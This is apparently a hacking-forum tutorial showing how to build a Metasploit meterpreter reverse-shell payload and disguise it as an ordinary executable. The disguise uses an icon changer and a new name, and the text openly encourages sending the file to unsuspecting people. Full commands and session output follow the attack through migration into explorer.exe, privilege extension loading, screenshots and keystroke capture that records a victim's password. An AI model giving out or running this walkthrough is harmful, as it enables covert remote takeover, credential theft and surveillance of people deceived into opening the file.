Download Metasploit on this site http://www.metasploit.com/download/ you can use it on windows or linux.
Install the program.
If it is only local network use your local IP address, if is it over internet, use your WAN IP address, you can see it from http://www.whatismyip.com/
start terminal/shell on backtrack.
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.113.201.34 LPORT=4444 x > /root/Payload.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: LHOST=10.113.201.34,LPORT=4444 root@bt:~#If you made the payload right, it will come like this, if dosent show like this, you did it wrong. The payload.exe file will be on your desktop.
I suggest if you can download Icon Changer 3.8 and change the Icon and named something more interesting, then can you easily make somebody to open the file.
Download Icon Changer 3.8 here: http://www.shelllabs...er_download.htm
start metasploit, and choose your exploit and PAYLOAD. Do it like above.
root@bt:~# msfconsole __ < metasploit > -- \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 575 exploits - 290 auxiliary + -- --=[ 212 payloads - 27 encoders - 8 nops =[ svn r9959 updated 241 days ago (2010.08.05) Warning: This copy of the Metasploit Framework was last updated 241 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: http://www.metasploit.com/redmine/projects/framework/wiki/Updating msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) >See wich options you have.
msf exploit(handler) > show options Module options: Name Current Setting Required Description ---- -- -- -- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- -- -- -- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard TargetWe are going to use our Local IP address on this time. do that by open new terminal/shell.
root@bt:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:32:56:46 inet addr:10.113.201.34 Bcast:10.113.201.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe32:5646/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:43 errors:0 dropped:0 overruns:0 frame:0 TX packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:5370 (5.3 KB) TX bytes:1152 (1.1 KB) Interrupt:19 Base address:0x2000Lets start to insert our IP and port. Let's get back to metasploit.
msf exploit(handler) > set LHOST 10.113.201.34 LHOST => 10.113.201.34 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Started reverse handler on 10.113.201.34:4444 [*] Starting the payload handler...Make someone to open the payload.exe I recommend to download Icon Changer 3.8 and change the payload.exe icon an rename it, and then you can send it to somebody. After they open the file will it be like this.
[*] Started reverse handler on 10.113.201.34:4444 [*] Starting the payload handler... [*] Sending stage (748032 bytes) to 10.113.201.59 [*] Meterpreter session 1 opened (10.113.201.34:4444 -> 10.113.201.59:7293) at 2011-04-03 22:44:14 -0200 meterpreter >We are going to migrate with explorer.exe now. type ps to see targets services.
meterpreter > ps Process list == PID Name Arch Session User Path --- ---- ---- -- ---- ---- 0 [System Process] 4 System 356 smss.exe 444 csrss.exe 508 wininit.exe 520 csrss.exe 556 services.exe 572 lsass.exe 580 lsm.exe 704 svchost.exe 768 nvvsvc.exe 808 svchost.exe 868 svchost.exe 900 svchost.exe 928 svchost.exe 1068 svchost.exe 1144 DisplayLinkManager.exe 1176 winlogon.exe 1316 Smc.exe 1400 nvvsvc.exe 1476 svchost.exe 1548 ccSvcHst.exe 1708 spoolsv.exe 1720 DisplayLinkUserAgent.exe 1752 svchost.exe 1992 svchost.exe 2040 IPROSetMonitor.exe 464 LVPrcSrv.exe 408 mdm.exe 940 svchost.exe 1140 Rtvscan.exe 1448 TeamViewer_Service.exe 2068 UltiDevCassinWebServer2a.exe 2144 vmware-usbarbitrator.exe 2268 vmnat.exe 2324 vmnetdhcp.exe 2360 vmware-authd.exe 2848 svchost.exe 2916 svchost.exe 3460 taskhost.exe x86 1 SERMERSOOQ\ilin C:\Windows\system32\taskhost.exe 3528 dwm.exe x86 1 SERMERSOOQ\ilin C:\Windows\system32\Dwm.exe [b] 3580 explorer.exe x86 1 SERMERSOOQ\ilin C:\Windows\Explorer.EXE[/b] 3740 DisplayLinkUI.exe x86 1 SERMERSOOQ\ilin C:\Program Files\DisplayLink Core Software\DisplayLinkUI.exe 4080 hqtray.exe x86 1 SERMERSOOQ\ilin C:\Program Files\VMware\VMware Player\hqtray.exe 2304 SmcGui.exe x86 1 2084 AdobeARM.exe x86 1 SERMERSOOQ\ilin C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe 2336 ccApp.exe x86 1 SERMERSOOQ\ilin C:\Program Files\Common Files\Symantec Shared\ccApp.exe 2000 LWS.exe x86 1 SERMERSOOQ\ilin C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe 3832 PWRISOVM.EXE x86 1 SERMERSOOQ\ilin C:\Program Files\PowerISO\PWRISOVM.EXE 4004 PrintScreen.exe x86 1 SERMERSOOQ\ilin C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe 1952 PRTG Windows GUI.exe x86 1 SERMERSOOQ\ilin C:\Program Files\PRTG Network Monitor\PRTG Windows GUI.exe 1936 CUCore.exe x86 1 SERMERSOOQ\ilin C:\Users\ilin\AppData\Local\Radvision\Conference Client\7.10.1.169\cucore.exe 2540 COCIManager.exe x86 1 SERMERSOOQ\ilin C:\Program Files\Common Files\Logishrd\LQCVFX\COCIManager.exe 4784 SearchIndexer.exe 2964 msnmsgr.exe x86 1 SERMERSOOQ\ilin C:\Program Files\Windows Live\Messenger\msnmsgr.exe 6028 wlcomm.exe x86 1 SERMERSOOQ\ilin C:\Program Files\Windows Live\Contacts\wlcomm.exe 5944 vmplayer.exe x86 1 SERMERSOOQ\ilin C:\Program Files\VMware\VMware Player\vmplayer.exe 5096 firefox.exe x86 1 SERMERSOOQ\ilin C:\Program Files\Mozilla Firefox\firefox.exe 448 plugin-container.exe x86 1 SERMERSOOQ\ilin C:\Program Files\Mozilla Firefox\plugin-container.exe 4488 vmware-vmx.exe 5200 Payload.exe x86 1 SERMERSOOQ\ilin C:\Users\ilin\Desktop\Payload.exe 5696 notepad.exe x86 1 SERMERSOOQ\ilin C:\Windows\system32\notepad.exe meterpreter > migrate 3580 [*] Migrating to 3580... [*] Migration completed successfully. meterpreter >I typed use priv to open hashdump or other things.
meterpreter > use priv Loading extension priv...success.type sysinfo to see wich system it is. Is it helpful?
meterpreter > sysinfo Computer: NUUMOB0088 OS : Windows 7 (Build 7600, ). Arch : x86 Language: da_DK meterpreter >Take screenshot of targets desktop, remember after you make screenshot, the file is on your desktop.
meterpreter > screenshot Screenshot saved to: /root/qgYuVeTx.jpeg meterpreter > /usr/lib/firefox-3.0.15/firefox: symbol lookup error: /usr/lib/xulrunner-1.9.0.15/libxul.so: undefined symbol: sqlite3_enable_shared_cache meterpreter >You kan scan/listen targets what ever det type, by this.
meterpreter > keyscan_dump Dumping captured keystrokes... <LWin> rnotepad <Return> my password it Hahahahaha <Alt> <LMenu> <Tab> meterpreter >don't wan't to wait for the host, you can just type the targets ip and port. My tutorials link is here https://www.nulledbl...ith-metasploit/